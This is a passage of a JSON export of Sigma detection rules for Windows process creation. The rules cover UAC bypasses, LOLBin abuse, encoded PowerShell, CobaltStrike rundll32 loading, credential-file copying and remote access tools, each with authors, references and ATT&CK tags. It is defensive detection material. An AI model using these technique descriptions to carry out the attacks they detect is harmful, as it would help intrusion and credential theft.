Unusual Parent Or Child Processes" }, { "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_wmp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" } ], "uuid": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", "value": "UAC Bypass Using Windows Media Player - Process" }, { "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Legitimate use of cmstp.exe utility by legitimate user" ], "filename": "proc_creation_win_uac_bypass_cmstp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md", "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1548.002", "attack.t1218.003" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e66779cc-383e-4224-a3a4-267eeb585c40", "value": "Bypass UAC via CMSTP" }, { "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-27", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_dllhost_no_cli_execution.yml", "level": "high", 
"logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf", "https://redcanary.com/blog/child-processes/", "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dllhost_no_cli_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", "value": "Dllhost.EXE Execution Anomaly" }, { "description": "Detects scheduled task creation using \"schtasks\" that contain potentially suspicious or uncommon commands", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-23", "falsepositive": [ "Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives" ], "filename": "proc_creation_win_schtasks_susp_pattern.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/", "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf", "https://twitter.com/RedDrip7/status/1506480588827467785", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_susp_pattern.yml" ], "tags": [ "attack.execution", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f2c64357-b1d2-41b7-849f-34d2682c0fad", "value": "Suspicious Command Patterns In 
Scheduled Task Creation" }, { "description": "Detects file execution using the msdeploy.exe lolbin", "meta": { "author": "Beyu Denis, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "System administrator Usage" ], "filename": "proc_creation_win_lolbin_msdeploy.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/", "https://twitter.com/pabraeken/status/999090532839313408", "https://twitter.com/pabraeken/status/995837734379032576", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "646bc99f-6682-4b47-a73a-17b1b64c9d34", "value": "Execute Files with Msdeploy.exe" }, { "description": "Detects the execution of a potential recon command where the results are piped to \"findstr\". 
This is meant to trigger on inline calls of \"cmd.exe\" via the \"/c\" or \"/k\" flags, for example.\nAttackers often use this technique to extract specific information they require in their reconnaissance phase.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2023-07-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_findstr_recon_pipe_output.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf", "https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html", "https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1057/T1057.md#atomic-test-6---discover-specific-process---tasklist", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output.yml" ], "tags": [ "attack.discovery", "attack.t1057" ] }, "related": [ { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ccb5742c-c248-4982-8c5c-5571b9275ad3", "value": "Recon Command Output Piped To Findstr.EXE" }, { "description": "Detects suspicious child processes of the SQLServer process. 
This could indicate potential RCE or SQL Injection.", "meta": { "author": "FPT.EagleEye Team, wagga", "creation_date": "2020-12-11", "falsepositive": [ "No established falsepositives" ], "filename": "proc_creation_win_mssql_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_susp_child_process.yml" ], "tags": [ "attack.t1505.003", "attack.t1190", "attack.initial-access", "attack.persistence", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", "value": "Suspicious Child Process Of SQL Server" }, { "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_mofcomp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml", "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://learn.microsoft.com/en-us/windows/win32/wmisdk/mofcomp", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mofcomp_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1dd05363-104e-4b4a-b963-196a534b03a1", "value": "Potential Suspicious Mofcomp Execution" }, { "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_ieinstal.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "80fc36aa-945e-4181-89f2-2f907ab6775d", "value": "UAC Bypass Using IEInstal - Process" }, { "description": "Detects uncommon child processes of Appvlp.EXE\nAppvlp or the Application Virtualization Utility is included with Microsoft Office. 
Attackers are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", "meta": { "author": "Sreeman", "creation_date": "2020-03-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_appvlp_uncommon_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml" ], "tags": [ "attack.t1218", "attack.defense-evasion", "attack.execution" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", "value": "Uncommon Child Process Of Appvlp.EXE" }, { "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", "meta": { "author": "Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io", "creation_date": "2018-04-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_office_susp_child_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml", "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", 
"https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html", "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", "https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/", "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_susp_child_processes.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1047", "attack.t1204.002", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "438025f9-5856-4663-83f7-52f878a70a50", "value": "Suspicious Microsoft Office Child Process" }, { "description": "Detects execution of the \"cloudflared\" tool with the tunnel \"cleanup\" flag in order to cleanup tunnel connections.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-17", "falsepositive": [ "Legitimate usage of Cloudflared." 
], "filename": "proc_creation_win_cloudflared_tunnel_cleanup.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/cloudflare/cloudflared", "https://developers.cloudflare.com/cloudflare-one/connections/connect-apps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml" ], "tags": [ "attack.command-and-control", "attack.t1102", "attack.t1090", "attack.t1572" ] }, "related": [ { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7050bba1-1aed-454e-8f73-3f46f09ce56a", "value": "Cloudflared Tunnel Connections Cleanup" }, { "description": "Detects usage of \"IMEWDBLD.exe\" to download arbitrary files", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2023-11-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_imewbdld_download.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_imewbdld_download.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "863218bd-c7d0-4c52-80cd-0a96c09f54af", "value": "Arbitrary File Download Via IMEWDBLD.EXE" }, { "description": "Detects specific combinations of encoding methods in PowerShell via the commandline", "meta": { "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "creation_date": "2020-10-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_encoding_patterns.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_encoding_patterns.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", "value": "Potential Encoded PowerShell Patterns In CommandLine" }, { "description": "Detects suspicious execution of 'Msbuild.exe' by an uncommon parent process", "meta": { "author": "frack113", "creation_date": "2022-11-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_msbuild_susp_parent_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/", "https://www.echotrail.io/insights/search/msbuild.exe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml" ], "tags": [ 
"attack.defense-evasion" ] }, "uuid": "33be4333-2c6b-44f4-ae28-102cdbde0a31", "value": "Suspicious Msbuild Execution By Uncommon Parent Process" }, { "description": "Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.", "meta": { "author": "@Kostastsale, @TheDFIRReport", "creation_date": "2022-12-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_emoji_usage_in_cli_2.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_2.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "c98f2a0d-e1b8-4f76-90d3-359caf88d6b9", "value": "Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2" }, { "description": "Detects execution of Microsoft bash launcher with the \"-c\" flag.\nThis can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.\n", "meta": { "author": "frack113", "creation_date": "2021-11-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_bash_command_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Bash/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bash_command_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5edc2273-c26f-406c-83f3-f4d948e740dd", "value": "Indirect Inline Command Execution Via Bash.EXE" }, { "description": "Detect execution of suspicious double extension files in ParentCommandLine", "meta": { "author": "frack113, Nasreddine 
Bencherchali (Nextron Systems)", "creation_date": "2023-01-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_double_extension_parent.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/7872d8845a332dce517adae9c3389fde5313ff2fed38c2577f3b498da786db68/behavior", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension_parent.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.007" ] }, "related": [ { "dest-uuid": "11f29a39-0942-4d62-92b6-fe236cf3066e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", "value": "Suspicious Parent Double Extension File Execution" }, { "description": "Detects execution of netsh with the \"advfirewall\" and the \"set\" option in order to set new values for properties of an existing rule", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-07-18", "falsepositive": [ "Legitimate administration activity", "Software installations and removal" ], "filename": "proc_creation_win_netsh_fw_set_rule.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ss64.com/nt/netsh.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_set_rule.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "a70dcb37-3bee-453a-99df-d0c683151be6", "value": "Firewall Rule Update Via Netsh.EXE" }, { "description": "Rundll32 can be used by Cobalt Strike with the StartW function to load DLLs from the command line.", "meta": { "author": "Wojciech Lesicki", "creation_date": "2021-06-01", "falsepositive": [ "Unknown" ], "filename": 
"proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://redcanary.com/threat-detection-report/", "https://www.cobaltstrike.com/help-windows-executable", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "value": "CobaltStrike Load by Rundll32" }, { "description": "Detects copying of files with well-known filenames (sensitive files with credential data)", "meta": { "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "creation_date": "2019-10-22", "falsepositive": [ "Copying sensitive files for legitimate use (e.g. backup) or forensic investigation by a legitimate incident responder or forensic investigator." 
], "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Esentutl.yml", "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002", "attack.t1003.003", "car.2013-07-001", "attack.s0404" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", "value": "Copying Sensitive Files with Credential Data" }, { "description": "Detects the execution of WMIC to query information on a remote system", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_remote_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_execution.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, 
"related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7773b877-5abb-4a3e-b9c9-fd0369b59b00", "value": "WMIC Remote Command Execution" }, { "description": "Detects the presence of the \"U+202E\" (Right-to-Left Override) character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading technique.\n", "meta": { "author": "Micah Babinski, @micahbabinski", "creation_date": "2023-02-15", "falsepositive": [ "Command lines that contain scripts such as Arabic or Hebrew might make use of this character" ], "filename": "proc_creation_win_susp_right_to_left_override.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method", "https://unicode-explorer.com/c/202E", "https://redcanary.com/blog/right-to-left-override/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.002" ] }, "related": [ { "dest-uuid": "77eae145-55db-4519-8ae5-77b0c7215d69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", "value": "Potential Defense Evasion Via Right-to-Left Override" }, { "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-04-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/rikvduijn/status/853251879320662017", 
"https://twitter.com/felixw3000/status/853354851128025088", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", "value": "Suspicious Control Panel DLL Load" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", "meta": { "author": "frack113", "creation_date": "2022-02-13", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_remote_access_tools_gotoopener.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_gotoopener.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", "value": "Remote Access Tool - GoToAssist Execution" }, { "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", "meta": { "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", "creation_date": "2023-02-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_recon_product_class.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md", "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_product_class.yml" ], "tags": [ "attack.execution", "attack.t1047", "car.2016-03-002" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], 
"uuid": "e568650b-5dcd-4658-8f34-ded0b1e13992", "value": "Potential Product Class Reconnaissance Via Wmic.EXE" }, { "description": "Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.", "meta": { "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-02-12", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_schtasks_reg_loader_encoded.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1053.005", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", "value": "Scheduled Task Executing Encoded Payload from Registry" }, { "description": "Detects various execution patterns of the CrackMapExec pentesting framework", "meta": { "author": "Thomas Patzke", "creation_date": "2020-05-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 